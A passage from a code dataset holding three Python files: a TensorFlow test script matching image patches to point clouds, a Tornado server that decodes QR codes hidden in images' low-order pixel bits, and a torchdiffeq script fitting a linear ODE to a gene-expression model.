iss_test_list[start_id:end_id]\n    for i in range(len(list_batch)):\n        pos_pcl = data.read_pcd(list_batch[i])\n        # > 1024 points\n        if pos_pcl.shape[0] > pcl_size:\n            random_id = np.random.permutation(pos_pcl.shape[0])\n            pos_pcl_batch[i, :, :] = pos_pcl[random_id[0:pcl_size]]\n        else:\n            pos_pcl_batch[i, 0:pos_pcl.shape[0], :] = pos_pcl \n\n    return pos_pcl_batch\n\n\ndef test(load_version, sift_test_list, iss_test_list, submap_id):\n    print ('----------------- START to test -----------------')\n\n    #sift_test_list = sift_test_list[submap_id-1][submap_image_id-1]\n    iss_test_list = iss_test_list[submap_id-1]\n    iss_test_file = \"iss_test_list_txt/%03d.txt\" % submap_id \n    with open(iss_test_file, 'w') as file:\n        for i in range(len(iss_test_list)):\n            file.write('%s\\n' % iss_test_list[i])\n\n    # define placeholders\n    image_pl = tf.placeholder(tf.float32, shape=[batch_size, image_size, image_size, 3])\n    pos_pcl_pl = tf.placeholder(tf.float32, shape=[batch_size, pcl_size, 3])\n    neg_pcl_pl = tf.placeholder(tf.float32, shape=[batch_size, pcl_size, 3])\n\n    is_training = tf.placeholder(tf.bool)\n\n    # build model\n    print ('build model')\n    with tf.device('/gpu:0'): # run the forward pass on gpu 0\n        with 
tf.variable_scope('image_branch') as scope:\n image_feature = vgg16(image_pl, is_training=True, output_dim=image_feature_dim,\n bn_decay=None)\n \n with tf.variable_scope('pointcloud_branch') as scope:\n pos_pcl_feature,_ = pointNet(pos_pcl_pl, pcl_feature_dim, is_training=is_training, \n use_bn=False, bn_decay=None)\n scope.reuse_variables()\n neg_pcl_feature,_ = pointNet(neg_pcl_pl, pcl_feature_dim, is_training=is_training, \n use_bn=False, bn_decay=None)\n\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=None) # tf.global_variables\n\n # run model\n print('run model...')\n config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.9\n with tf.Session(config=config) as sess:\n \n print('initialise model...')\n sess.run(tf.global_variables_initializer())\n print(' load model...')\n save_path = 'model/' + 'v2' + '/' + load_version +'_model.ckpt'\n saver.restore(sess, save_path)\n #restore_tf_model(sess)\n print(\" Model loaded from: %s\" % save_path)\n \n # -------------------- evaluate model ---------------------\n print('**** Validate ...')\n print(' Compute image and pcl descriptors')\n \n\n iss_batch_num = len(iss_test_list) // batch_size \n iss_test_num = iss_batch_num * batch_size \n \n pcl_feature = np.zeros([iss_test_num, pcl_feature_dim]) \n \n # feed iss test list into the network\n batch_counter = 0\n print('-------- test iss --------------')\n for i in range(iss_batch_num):\n print(\" *** iss progress: %d/%d\" % (i, iss_batch_num))\n pcl_batch = getISSTestBatch(iss_test_list,i)\n feed_dict = {pos_pcl_pl:pcl_batch, is_training: False}\n pcl_batch_feature = sess.run(pos_pcl_feature, feed_dict=feed_dict)\n pcl_feature[batch_counter: batch_counter+pcl_batch_feature.shape[0],:] = pcl_batch_feature\n batch_counter += pcl_batch_feature.shape[0] \n \n print('---------- test sift ----------')\n sift_submap_test_list = sift_test_list[submap_id-1] # all images\n for k in range(len(sift_submap_test_list)):\n sift_test_list = sift_submap_test_list[k] # image id: i+1 \n cam_id = sift_test_list[0].split('/')[-2] # expected 'cam1_xxx'\n # record test_list for checking\n sift_test_file = \"sift_test_list_txt/%03d_%s.txt\" % (submap_id, cam_id)\n with open(sift_test_file, 'w') as file:\n for i in range(len(sift_test_list)):\n file.write('%s\\n' % sift_test_list[i])\n \n # test the patches from one image in the submap\n sift_batch_num = len(sift_test_list) // batch_size\n sift_test_num = sift_batch_num * batch_size\n img_feature = np.zeros([sift_test_num, image_feature_dim])\n \n # feed sift test list into the network\n batch_counter = 0\n print(\" *** image id: %d/%d\" % (k,len(sift_submap_test_list)))\n for i in range(sift_batch_num):\n #print(\" *** image id: %d/%d, batch id: %d/%d\" % (k, len(sift_submap_test_list), i, sift_batch_num))\n img_batch = getSIFTTestBatch(sift_test_list, i)\n #print img_batch.shape\n feed_dict = {image_pl:img_batch, is_training: False}\n img_batch_feature = sess.run(image_feature, feed_dict=feed_dict)\n #print type(img_batch_feature)\n img_feature[batch_counter: batch_counter+img_batch_feature.shape[0],:] = img_batch_feature\n batch_counter += img_batch_feature.shape[0] \n \n # compute distance array between img_feature and pcl_feature\n img_vec = np.sum(np.multiply(img_feature, img_feature), axis=1, keepdims=True)\n pcl_vec = np.sum(np.multiply(pcl_feature, pcl_feature), axis=1, keepdims=True)\n dist_array = img_vec + np.transpose(pcl_vec) 
- 2*np.matmul(img_feature, np.transpose(pcl_feature))\n print(\" image patch num: %d, submap pcl num: %d\" % (dist_array.shape[0], dist_array.shape[1]))\n \n # find correspondences and record\n # img_pcl_correspondences = [];\n cam_id = sift_test_list[0].split('/')[-2]\n txt_folder = \"%s/%03d\" % (sift_iss_correspond_dir, submap_id)\n if not os.path.exists(txt_folder):\n os.makedirs(txt_folder)\n txt_file_path = \"%s/%s.txt\" % (txt_folder, cam_id)\n top_k = 10\n with open(txt_file_path, \"w\") as file:\n for i in range(dist_array.shape[0]):\n #min_dist_id = np.argmin(dist_array[i,:])\n min_dist_id = np.argsort(dist_array[i,:])[:top_k]\n idx = np.concatenate((np.array([i+1]), min_dist_id+1))\n #print(idx)\n idx=idx.reshape(1, idx.shape[0])\n np.savetxt(file, idx,fmt='%d')\n \nif __name__ == '__main__':\n \n load_version = 'v1_2_1000'\n \n# date_time = '2014-07-14-15-16-36'\n \n submap_id = 119 #116-121\n \n sift_test_root = '/media/mengdan/data3/robotcar/grasshopper/sift_patch_test/' + date_time + '/'\n iss_test_root = '/media/mengdan/data3/robotcar/grasshopper/iss_volume_test/' + date_time + '/' \n\n # read test data\n sift_test_list, iss_test_list = readTestData(sift_test_root, iss_test_root) \n # test \n test(load_version, sift_test_list, iss_test_list, submap_id)\n ", "sub_path": "code_network/test_256.py", "file_name": "test_256.py", "file_ext": "py", "file_size_in_byte": 10662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 68, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 83, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "read_dataset.Data", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "read_dataset.Data", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 148, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 150, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.device", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 157, "usage_type": "call"}, {"api_name": "vgg16.vgg16", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 161, "usage_type": "call"}, {"api_name": "pointNet.pointNet", 
"line_number": 162, "usage_type": "call"}, {"api_name": "pointNet.pointNet", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tensorflow.all_variables", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "598177257", "text": "import tornado.ioloop\nimport tornado.web\nimport qrcode\nimport json\nimport pybase64\nimport math\nimport io\nfrom PIL import Image\nfrom pyzbar.pyzbar import decode\nfrom PIL.PngImagePlugin import PngImageFile, PngInfo\nimport random\n\nSETTING_BITS_NUM = 2500\nCONFIG_QRCODE_WIDTH = 46\n\nclass DataExtractor(tornado.web.RequestHandler):\n\t# CORS_ORIGIN = '*'\n\t# CORS_HEADERS = 'Content-Type'\n\t# CORS_METHODS = 'POST'\n\t\n\tdef set_default_headers(self):\n\t\tself.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\t\tself.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n\t\tself.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\t\t\n\t# extract a single bit from the rgb value\n\tdef extract_qrcode_bit(self, rgbH, pageNum):\n\t\trH, gH, bH = rgbH\n\t\tpixelBit = '1'\n\t\tif pageNum == 0:\n\t\t\tpixelBit = rH[7:8]\n\t\telif pageNum == 1:\n\t\t\tpixelBit = rH[6:7]\n\t\telif pageNum == 2:\n\t\t\tpixelBit = gH[7:8]\n\t\telif pageNum == 3:\n\t\t\tpixelBit = gH[6:7]\n\t\telif pageNum == 4:\n\t\t\tpixelBit = bH[7:8]\n\t\telif pageNum == 5:\n\t\t\tpixelBit = bH[6:7]\n\t\t\t# the final value of this pixel\n\t\t\t# print(pixelBit, 'pixelBit == 0', pixelBit == '0', 'pixelBit == 1', pixelBit == '1')\n\t\treturn pixelBit\t\t\n\n\t# transform the int type to binary type\n\tdef __int_to_bin(self, rgb):\n\t\t\"\"\"Convert an integer tuple to a binary (string) tuple.\n\t\t:param rgb: An integer tuple (e.g. (220, 110, 96))\n\t\t:return: A string tuple (e.g. 
(\"00101010\", \"11101011\", \"00010110\"))\n\t\t\"\"\"\n\t\t# r, g, b, o = rgb\n\t\treturn ('{0:08b}'.format(rgb[0]),\n\t\t\t\t'{0:08b}'.format(rgb[1]),\n\t\t\t\t'{0:08b}'.format(rgb[2]))\t\n\n\t# judge whether the pixel is black\n\tdef is_black(self, qrcodePixel):\n\t\tisBlack = True\n\t\tfor i in range(len(qrcodePixel)):\n\t\t\tif qrcodePixel[i] == 255:\n\t\t\t\tisBlack = False\n\t\t\t\tbreak\n\t\treturn isBlack\n\n\t# judge whether the pixel is white\n\tdef is_white(self, qrcodePixel):\n\t\tisWhite = True\n\t\tfor i in range(len(qrcodePixel)):\n\t\t\tif qrcodePixel[i] == 0:\n\t\t\t\tisWhite = False\n\t\t\t\tbreak\n\t\treturn isWhite\n\n\t# extract the bit list from host image\n\tdef extract_qrcode_bit_list(self, hostImage, hostImageHideChannel):\n\t\thostImageWidth = hostImage.size[0]\n\t\thostImageHeight = hostImage.size[1]\n\t\thostImageMap = hostImage.load()\n\t\tqrCodeBitList = []\n\t\tfor i in range(hostImageHideChannel):\n\t\t\tfor j in range(hostImageWidth):\n\t\t\t\tfor k in range(hostImageHeight):\n\t\t\t\t\trgbH = self.__int_to_bin(hostImageMap[j, k])\n\t\t\t\t\tqrcodeBit = int(self.extract_qrcode_bit(rgbH, i))\n\t\t\t\t\tqrCodeBitList.append(qrcodeBit)\n\t\treturn qrCodeBitList\n\n\t# parse the string information from the Qrcode image list\n\tdef parse_encoding_str(self, extractQrcodeImgList):\n\t\tparseEncodingStr = ''\n\t\tfor i in range(len(extractQrcodeImgList)):\n\t\t\tqrcodeImg = extractQrcodeImgList[i]\n\t\t\tqrcodeImgResult = decode(qrcodeImg)\n\t\t\t# qrcodeImg.show()\n\t\t\tif (len(qrcodeImgResult) > 0):\n\t\t\t\tparseEncodingStr = parseEncodingStr + qrcodeImgResult[0].data.decode('utf-8')\n\t\treturn parseEncodingStr\n\n\t# assemble the qrcode image from the extracted bit list\n\tdef revert_qrcode_image_list(self, extractQrcodeImgBitList, qrCodeCellMaxLen, qrCodeCellNum, qrCodeNum):\n\t\tqrCodeSideLen = qrCodeCellMaxLen * qrCodeCellNum\n\t\tqrcodeImgList = []\n\t\tqrcodeBitIndex = 0\n\t\twholeQRcodeNum = math.floor(len(extractQrcodeImgBitList) / (qrCodeSideLen * qrCodeSideLen))\n\t\tprint('extractQrcodeImgBit length', len(extractQrcodeImgBitList), 'qrCodeSideLen', qrCodeSideLen)\n\t\tprint('qrCodeNum', qrCodeNum, 'wholeQrcodeNum', wholeQRcodeNum)\n\t\tif qrCodeNum > wholeQRcodeNum:\n\t\t\tqrCodeNum = wholeQRcodeNum\n\t\t# TODO\n\t\t# qrCodeNum = 1\n\t\tfor i in range(qrCodeNum):\n\t\t\tinitQRCodeImg = Image.new(mode = \"RGB\", size = (qrCodeSideLen, qrCodeSideLen))\n\t\t\tinitQRCodeImgMap = initQRCodeImg.load()\n\t\t\tfor j in range(qrCodeSideLen):\n\t\t\t\tfor k in range(qrCodeSideLen):\n\t\t\t\t\tif extractQrcodeImgBitList[qrcodeBitIndex] == 1:\n\t\t\t\t\t\tinitQRCodeImgMap[j, k] = (255, 255, 255)\n\t\t\t\t\telif extractQrcodeImgBitList[qrcodeBitIndex] == 0:\n\t\t\t\t\t\tinitQRCodeImgMap[j, k] = (0, 0, 0)\n\t\t\t\t\tqrcodeBitIndex += 1\n\t\t\t# initQRCodeImg.show()\n\t\t\t# qrcodeImgStr = decode(initQRCodeImg)\n\t\t\t# print('qrcodeImgStr', qrcodeImgStr)\n\t\t\tqrcodeImgList.append(initQRCodeImg)\n\t\treturn qrcodeImgList\n\n\t# correct the pixel color in the image\n\tdef correct_qrcode_image_list(self, extractQrcodeImgList, qrCodeCellMaxLen):\n\t\tfor i in range(len(extractQrcodeImgList)):\n\t\t\tqrcodeImg = extractQrcodeImgList[i]\n\t\t\tqrcodeImgMap = qrcodeImg.load()\n\t\t\tqrcodeImgWidth = qrcodeImg.size[0]\n\t\t\t# print('qrcodeImgWidth', qrcodeImgWidth)\n\t\t\tfor cellX in range(0, (qrcodeImgWidth), qrCodeCellMaxLen):\n\t\t\t\tfor cellY in range(0, (qrcodeImgWidth), qrCodeCellMaxLen):\n\t\t\t\t\tsumBlackBitNum = 0\n\t\t\t\t\tsumWhiteBitNum = 
0\n\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\tfor localX in range(qrCodeCellMaxLen):\n\t\t\t\t\t\tfor localY in range(qrCodeCellMaxLen):\n\t\t\t\t\t\t\tpixelX = cellX + localX\n\t\t\t\t\t\t\tpixelY = cellY + localY\n\t\t\t\t\t\t\tif self.is_black(qrcodeImgMap[pixelX, pixelY]):\n\t\t\t\t\t\t\t\tsumBlackBitNum += 1\n\t\t\t\t\t\t\tif self.is_white(qrcodeImgMap[pixelX, pixelY]):\n\t\t\t\t\t\t\t\tsumWhiteBitNum += 1\n\t\t\t\t\t# correct bits in Qrcode\n\t\t\t\t\t# if sumWhiteBitNum != 0 and sumBlackBitNum != 0:\n\t\t\t\t\t# \t\tprint('sumWhiteBitNum', sumWhiteBitNum, 'sumBlackBitNum', sumBlackBitNum)\n\t\t\t\t\tif sumBlackBitNum > sumWhiteBitNum:\n\t\t\t\t\t\t# set black\n\t\t\t\t\t\tcellColor = (0, 0, 0)\n\t\t\t\t\telif sumBlackBitNum < sumWhiteBitNum:\n\t\t\t\t\t\t# set white\n\t\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# set the color (white or black) of this pixel randomly \n\t\t\t\t\t\tif random.random() > 0.5:\n\t\t\t\t\t\t\tcellColor = (0, 0, 0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\t# set the pixel color of whole cell\n\t\t\t\t\tfor localX in range(qrCodeCellMaxLen):\n\t\t\t\t\t\tfor localY in range(qrCodeCellMaxLen):\n\t\t\t\t\t\t\tpixelX = cellX + localX\n\t\t\t\t\t\t\tpixelY = cellY + localY\n\t\t\t\t\t\t\tqrcodeImgMap[pixelX, pixelY] = cellColor\n\t\treturn extractQrcodeImgList\n\n\tdef assembleResultObj(self, messageType, message, extractStr=\"\"):\n\t\treturn {\n\t\t\t'type': messageType,\n\t\t\t'message': message,\n\t\t\t'extractStr': extractStr\n\t\t}\n\n\tdef get(self):\n\t\tself.write(\"Hello, world\")\n\n\tdef post(self):\n\t\tself.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\t\tself.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n\t\tself.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\t\trequestBinary = self.request.body\n\t\trequestStr = requestBinary.decode()\n\t\timgdatahead, imgdatacontent = requestStr.split(\",\")\n\t\tprint('imgdatahead', imgdatahead)\n\t\t# extract the parameters from the imgdatahead\n\t\tqrCodeNum = 0\n\t\tqrCodeCellNum = 179\n\t\tqrCodeCellMaxLen = 2\n\t\t# store the qrcode data into the imagedatacontent\n\t\timgdata = pybase64.b64decode(imgdatacontent)\n\t\thostImage = Image.open(io.BytesIO(imgdata))\n\t\t# evaluate whether the image is suitable for decoding\n\t\t# if hasattr(hostImage, 'text'):\n\t\t# \tEmbedInfoObj = hostImage.text\n\t\t# \tprint('EmbedInfoObj', EmbedInfoObj)\n\t\t# \tif 'qrCodeNum' in EmbedInfoObj and 'qrCodeCellNum' in EmbedInfoObj and 'qrCodeCellMaxLen' in EmbedInfoObj:\n\t\t# \t\tqrCodeNum = int(EmbedInfoObj['qrCodeNum'])\n\t\t# \t\tqrCodeCellNum = int(EmbedInfoObj['qrCodeCellNum'])\n\t\t# \t\tqrCodeCellMaxLen = int(EmbedInfoObj['qrCodeCellMaxLen'])\n\t\t# \t\tprint('qrCodeNum', qrCodeNum, 'qrCodeCellNum', qrCodeCellNum, 'qrCodeCellMaxLen', qrCodeCellMaxLen)\n\t\t# \telse:\n\t\t# \t\tnotCompleteInfoMessage = 'The properties of this image are not complete.'\n\t\t# \t\tresultObj = self.assembleResultObj('error', notCompleteInfoMessage)\n\t\t# \t\tself.write(json.dumps(resultObj))\n\t\t# \t\treturn\n\t\t# else:\n\t\t# \tnotEmbedInfoMessage = 'The image does not embed other information.'\n\t\t# \tresultObj = self.assembleResultObj('error', notEmbedInfoMessage)\n\t\t# \tprint('resultObj', resultObj)\n\t\t# \tresultObjStr = json.dumps(resultObj)\n\t\t# \tself.write(resultObjStr)\n\t\t# \treturn\n\t\thostImageWidth = hostImage.size[0]\n\t\thostImageHeight = hostImage.size[1]\n\t\thostImageHideChannel = 6\n\t\t# the 
parsing part, extract the bit list of qrcode image from the host image\n\t\textractQrcodeImgBitList = self.extract_qrcode_bit_list(hostImage, hostImageHideChannel)\n\t\tprint('finish extract_qrcode_bit_list')\n\t\tconfigQrcodeBitSize = CONFIG_QRCODE_WIDTH * CONFIG_QRCODE_WIDTH\n\t\textractConfigQrcodeImgBitList = extractQrcodeImgBitList[:configQrcodeBitSize]\n\t\tprint('length', len(extractQrcodeImgBitList), 'CONFIG_QRCODE_WIDTH', CONFIG_QRCODE_WIDTH)\n\t\tqrcodeBorderWidth = 1\n\t\tconfigQrCodeModule = 1\n\t\tconfigQrCodeCellMaxLen = 2\n\t\t # the side length of the qrcode content plus the border width\n\t\tconfigQrCodeCellNum = (configQrCodeModule * 4 + 17) + qrcodeBorderWidth * 2\n\t\tconfigExtractQrcodeImgList = self.revert_qrcode_image_list(extractConfigQrcodeImgBitList, configQrCodeCellMaxLen, configQrCodeCellNum, 1)\n\t\tcorrectConfigExtractQrcodeImgList = self.correct_qrcode_image_list(configExtractQrcodeImgList, qrCodeCellMaxLen)\n\t\textractConfigStr = self.parse_encoding_str(correctConfigExtractQrcodeImgList)\n\t\tprint('extractConfigStr', extractConfigStr)\n\t\t[qrCodeNumStr, qrcodeModuleStr, qrCodeCellMaxLenStr] = extractConfigStr.split(' ')\n\t\tqrCodeNum = int(qrCodeNumStr)\n\t\tqrcodeModule = int(qrcodeModuleStr)\n\t\tqrCodeCellMaxLen = int(qrCodeCellMaxLenStr)\n\t\tqrCodeCellNum = (qrcodeModule * 4 + 17) + qrcodeBorderWidth * 2\n\t\tprint('qrCodeNum', qrCodeNum, 'qrCodeCellNum', qrCodeCellNum, 'qrCodeCellMaxLen', qrCodeCellMaxLen)\n\t\t#\n\t\tprint('length', len(extractQrcodeImgBitList))\n\t\textractContentQrcodeImgBitList = extractQrcodeImgBitList[SETTING_BITS_NUM:]\n\t\t# revert the qrcode image list from the qrcode image bit list\n\t\textractQrcodeImgList = self.revert_qrcode_image_list(extractContentQrcodeImgBitList, qrCodeCellMaxLen, qrCodeCellNum, qrCodeNum)\n\t\tprint('finish extract_qrcode_bit_list')\n\t\tcorrectedExtractQrcodeImgList = self.correct_qrcode_image_list(extractQrcodeImgList, qrCodeCellMaxLen)\n\t\tprint('finish qrcode correction')\n\t\t# extract the qrcode image to the inner string\n\t\textractStr = self.parse_encoding_str(extractQrcodeImgList)\n\t\tprint('finish parse_encoding_str')\n\t\tsuccessMessage = \"Extract the information from the image successfully!\"\n\t\t# print('extractStr', extractStr)\n\t\tresultObj = self.assembleResultObj('success', successMessage, extractStr)\n\t\tself.write(json.dumps(resultObj))\n\t\tprint('finish decoding')\n\t\treturn\n", "sub_path": "server/DataExtractor.py", "file_name": "DataExtractor.py", "file_ext": "py", "file_size_in_byte": 10066, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tornado.ioloop.web", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 16, "usage_type": "name"}, {"api_name": "pyzbar.pyzbar.decode", "line_number": 94, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 105, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 113, "usage_type": "name"}, {"api_name": "random.random", "line_number": 159, "usage_type": "call"}, {"api_name": "pybase64.b64decode", "line_number": 194, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 195, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 195, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 195, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 255, "usage_type": "call"}]} 
+{"seq_id": "338590950", "text": "import numpy as np\nimport torch\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n#from torchdiffeq import odeint\nfrom torchdiffeq import odeint_adjoint as odeint\n\nsys.path.append('/home/cwildne/code/linear_memory')\nfrom linear_memory.linear_memory import LinearMemory\nimport linear_memory.utils as ut\nfrom import_utils import add_path\n\nadd_path('pyssa')\nimport pyssa.ssa as ssa\nimport pyssa.models.standard_models as sm\n\nadd_path('pymbvi')\nfrom pymbvi.models.mjp.autograd_partition_specific_models import SimpleGeneExpression\nfrom pymbvi.util import num_derivative, autograd_jacobian\n\ntorch.manual_seed(2007301620)\n\n# get simulation model\npre, post, rates = sm.get_standard_model(\"simple_gene_expression\")\n\n# prepare initial conditions\ninitial = np.array([0.0, 1.0, 0.0, 0.0])\ntspan = np.array([0.0, 3e3])\n\n# set up gene expression model\nmoment_initial = np.zeros(9)\nmoment_initial[0:3] = initial[1:4]\nmodel = SimpleGeneExpression(moment_initial, np.log(np.array(rates)), tspan)\n\n\nclass LinearODE(torch.nn.Module):\n\n def __init__(self, A, b):\n super(LinearODE, self).__init__()\n self.A = torch.nn.Parameter(A)\n self.b = torch.nn.Parameter(b)\n\n def forward(self, time, state):\n dydt = self.A @ state + self.b\n return(dydt)\n\n\n# get A for linear gene expression model\nrates = torch.tensor(rates).log()\nmoment_initial = torch.tensor(moment_initial)\ndef fun(state):\n tmp = model.forward_torch(0.0, state, torch.zeros(rates.shape), rates)\n return(tmp)\nA = autograd_jacobian(fun, moment_initial)\nb = fun(torch.zeros(moment_initial.shape))\nmodel = LinearODE(A, b)\n\n# compute true solution\nt_eval = torch.arange(tspan[0], tspan[1], 20)\nwith torch.no_grad():\n sol = odeint(model, moment_initial, t_eval)\n\n# reset model parameters\nmodel.A = torch.nn.Parameter(torch.zeros(model.A.shape))\nmodel.b = torch.nn.Parameter(torch.zeros(model.b.shape))\n\n# get data\nt_data = t_eval[0::15]\ndata = sol[0::15]\n\n# optimizer \nparams = model.parameters()\n#optimizer = torch.optim.SGD(params, lr=1e-10)\noptimizer = torch.optim.LBFGS(params, lr=1e-2)\n\ndef loss_fn(predict, data):\n predict = odeint(model, moment_initial, t_data)\n loss = torch.sum(((predict-data)/(data+1))**2)\n return(loss)\n\ndef loss_stat(model, data):\n mean = data.mean(axis=0)\n loss = torch.sum(model.forward(0.0, mean)**2)\n return(loss)\n\ndef l1(model):\n loss = 0.0\n for p in model.parameters():\n loss += torch.abs(p).sum()\n return(loss)\n\ndef l2(model):\n loss = 0.0\n for p in model.parameters():\n loss += torch.sum(p**2)\n return(loss)\n\ndef closure():\n if torch.is_grad_enabled():\n optimizer.zero_grad()\n loss = loss_fn(model, data) + 10*l1(model)\n if loss.requires_grad:\n try:\n loss.backward()\n except:\n print(\"Error during backpropgation\")\n return(loss)\n\n# fit\nmax_epoch = 500\nloss_history = []\nsave_path = os.path.dirname(os.path.realpath(__file__)) + '/data/learn_linear_ode_train.pt'\nmsg = 'Loss in epoch {0} is {1}'\nfor epoch in range(max_epoch):\n loss = optimizer.step(closure)\n loss_history.append(loss.item())\n with torch.no_grad():\n #loss1 = loss_stat(model, data)\n loss2 = 10*l1(model)\n print(msg.format(epoch, loss.item()))\n #print('Stationary loss is {}'.format(loss1))\n print('Parameter loss is {}'.format(loss2))\n # save\n torch.save({'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss_history': torch.tensor(loss_history)}, save_path)\nwith torch.no_grad():\n 
sol_final = odeint(model, moment_initial, t_eval)\n\n# # plot\n# for i in range(8):\n# plt.subplot(3, 3, i+1)\n# plt.plot(t_eval, sol[:, i], '-b')\n# plt.plot(t_eval, sol_final[:, i], '-r')\n# plt.plot(t_data, data[:, i], 'xk')\n# plt.show()\n", "sub_path": "examples/gene_expression/learn_linear_ode.py", "file_name": "learn_linear_ode.py", "file_ext": "py", "file_size_in_byte": 3870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "import_utils.add_path", "line_number": 14, "usage_type": "call"}, {"api_name": "import_utils.add_path", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 22, "usage_type": "call"}, {"api_name": "pyssa.models.standard_models.get_standard_model", "line_number": 25, "usage_type": "call"}, {"api_name": "pyssa.models.standard_models", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "pymbvi.models.mjp.autograd_partition_specific_models.SimpleGeneExpression", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "pymbvi.util.autograd_jacobian", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 61, "usage_type": "call"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 65, "usage_type": 